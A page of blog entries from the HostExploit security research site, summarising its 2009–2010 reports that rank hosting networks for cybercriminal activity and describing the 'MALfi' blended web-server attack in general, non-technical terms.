Thursday, December 18, 2014
Text Size


Top 50 Bad Hosts, Q2 2010

Thursday, 15 July 2010 08:13 in Blogs, Reports by Will Rogofsky


Press Release

HostExploit is pleased to present the Q2 2010 report on the ‘Top 50 Bad Hosts and Networks’. At rank #1 in the report, Demand Media/eNom (USA) earns the label of ‘worst host’ from security analysts at HostExploit, taking over the top spot from Ecatel (Netherlands). A detailed analysis shows high levels of Internet ‘badness’ and cybercriminal activity hosted by Demand Media/eNom in their role as a hosting provider.

Download the report here.

Using data, supplied by, together with Open Source Security data partners, HostExploit has released an updated HE Index of the worst internet hosting operators around the world. Compiled by actuarial analysis on data provided from all 34,748 public ASes (Autonomous Systems), the HE Index is presented as an easy-to-understand ‘badness’ rating, on a scale of 0 to 1000, published in tables and charts. With a focus on the worst aspects of cybercriminal activity, the HE Index also takes into account factors such as: size of network; potential for the hosting of botnets; distribution of malware, exploits, rogues and spam.


AS50896 PROXIEZ – Overview of a Crime Server

Monday, 17 May 2010 22:02 in Blogs, Reports by Jart Armin

At 9:00am EST on Friday May14th AS50896 PROXIEZ lost its ability to infect the Internet. To avoid confusion there were ‘unsuccessful’ attempts to reconnect on Saturday & Sunday May 15/16th. This is where there may have been reports of connections to bots and malware being still alive.

The upstream peer AS50818 DIGERNET was also disconnected from the Internet @ 10:30am EST on Friday May14th. AS50908 EVAUA (InfoPlus Ltd.) is currently attempting to serve the Zeus C&Cs as a replacement for Proxiez.

AS50896 PROXIEZ – Issued by RIPE and first active April 19th 2010 and AS50908 EVAUA first active May17th 2010 again leads to the question the issuance of ASNs and IP ranges by RIPE which are immediately utilized for crime servers.

Mini Report in PDF can be downloaded here (registration required).


Top 50 Bad Hosts March 2010 - New Report

Monday, 05 April 2010 15:40 in Blogs, Reports by Will Rogofsky

HostExploit is pleased to present the Q1 2010 report on the Top 50 Bad Hosts and Networks. Using our own data, supplied by, together with Open Security partners, HostExploit has compiled an updated HE Index of the worst internet hosting players around the world.

Download the report here.

Findings in the report are based on data generated by public ASes (Autonomous Systems) exchanging routing information with each other over the public internet. ‘Bad’ activity in this context includes traffic generated by botnets, spam, MALfi, phishing, malware, exploits and the control centers that manage these activities.

By using a unique combination of actuarially-weighted mathematical equations, a bespoke ‘badness’ rating is created showing the worst hosting organizations for cyber-criminal activity. Consideration is given to the size of each network and related potential for malware distribution where larger servers should have the means to track cyber-criminal activity more effectively.


Report - Top 50 Bad Hosts & Networks 2009

Monday, 14 December 2009 12:00 in Blogs, Reports by Will Rogofsky


HostExploit is proud to announce the “winners” of the Bad Internet Host of 2009 awards, alongside the definitive Top 50 Bad Hosts and Networks report. The findings are powered by the newly-created HE Index - a numerical representation of internet badness.

Download the report here.

The report comprises an exhaustive analysis of the Internet hosting industry (servers and Autonomous Systems) by the researchers at HostExploit, with community input and data from 16 authorative community sources. The result is a definitive list of the worst commercial servers around the globe, in terms of server badness. Detailed reports on each of the top 150 bad servers can be viewed on

The report analyses the wide range of crimes which affect all of our lives, and through the use of sophisticated math and our researchers’ vast experience, HostExploit has been able to produce what is perhaps the most definitive list to date and an easy-to-understand badness index. Beyond this, the report analyses the effects by country, the worst culprits within cybercrime categories (i.e. spam, malicious software, malware, botnet serving, Zeus, etc.), the attack vectors for specific cybercriminal activities and much more.

Legitimate businesses may wish to reconsider hosting a web site with a hosting service which has a high HE Index. In addition to supporting a hosting service that has a disproportionate amount of malicious activity, there is the risk of being blacklisted by having your web site on such a server.

However, it is not all bad news; part of the project also provides examples of the cleanest hosts around the world to demonstrate how such Internet badness can be avoided by commercial servers.

In providing this report, the emphasis was to review servers that could be considered medium to large scale commercial operations, with a few exceptions. The report highlights the issues which face the internet community due to the lack of accountability required of internet service providers whose servers are utilized for cybercrime.

This new report is available for a free PDF download at - the producers of community reports exposing RBN (Russian Business Network), Atrivo, McColo and Real Host, and a foremost source of rogue and malicious network activity analysis on the Internet.


MALfi A Silent Threat

Wednesday, 11 November 2009 07:58 in Blogs, Reports by Jart Armin

Cyber Crime International – MALfi

A new cybercrime report from the producers of the definitive reports
exposing RBN (Russian Business Network), Atrivo, McColo, Real Host, and a foremost
source of rogue network activity analysis on the Internet.

Download the report here.

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – HostExploit Download page =

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs

RFI is used by hackers to compromise websites and upload a remote user interface shell. This
ensures partial to full manual and unauthorized control over the server. This differs from the
now familiar “drive by” web site exploit as it provides hackers with a ready-made arena where
internet plunder in the form of information, controlled servers and web sites are exchanged or
resold to cyber criminal groups.

Essentially the RFI hackers continuously and automatically search for website vulnerabilities for
exploitation. Once breached, the websites and often the now compromised underlying servers,
are utilized for DDoS (distributed denial of service) attacks such as the recent US and Korean
government DDoS, spamming, phishing, large scale ID theft and to facilitate further attacks on
other targets. It follows that many of the regular and apparently attempted attacks on various
high volume governmental and key servers were RFI and similar vulnerability scanning, bots
and scripts.

In comparing RFI and SQL injection / viruses / worms, RFI scanning, and related exploitation,
happens continuously and affects all corners of the Internet. Both un-patched windows systems
and systems with RFI vulnerabilities are on a theoretical time to live?.

The three distinct stages of this serious but silent threat to Internet security are:

First stage – Remote File Inclusion Attack: Hacked websites and servers are not infectious to
the web visitor and remain undetected by most AV vendors including, for example, Google?s
safe browsing feature. This “crack in the door” provides for the second stage.

Second stage – Doing Damage: Here the compromised websites and servers have attacker
tools uploaded. These consist of both purchased and custom written tools to conduct nefarious
activities such as sending phishing emails, hosting phishing sites, sending SPAM, hosting
malware, defacing, DDoS and much more. XSA (Cross server attacks), LFI (local file inclusion),
and RCE (remote file inclusion) further compromise the system or other remote systems.

Third stage – Detection Avoidance: Upon completion of the cybercriminal action or discovery of
their attack, the miscreant removes their tools or causes them to self destruct before moving on.
With full control of the system, covering their tracks is accomplished easily.

With this technique there is no master server and no simple tracking. The compromised servers
are controlled via various anonymous web proxies and compromised hosts, in a totally de-
centralized manner. IRC (internet relay chat) is primarily used in a cell like communication
structure to co-ordinate efforts and to launch vulnerability scans.

Identification of specific botnets such as Storm or Cutwail has been used to gather valuable
cyber criminal intelligence but the de-centralized nature of RFI based attacks requires deeper
investigation and wider application of fundamental COMINT (communication intelligence)
techniques. Even after being discovered, hackers using the RFI technique still have the
compromised web sites to re-launch from or even to re-utilize. The whole process begins again
with scanning for vulnerabilities with a new disposable single use botnet.

The how, what and where of this particular hacking technique and cybercrime business model
are provided together with detailed and graphic explanations in the HostExploit community
research report.

For report download here
- for further information contact:

Jart Armin – jart (at),

Scott D Logan - scott (at),

General enquiries - admin (at)

Release Date - Nov 11th 2009


Page 4 of 5

Latest Blogs

  • 1
  • 2
  • 3


Sign up to the HostExploit newsletter to receive the latest news on HostExploit reports and other developments.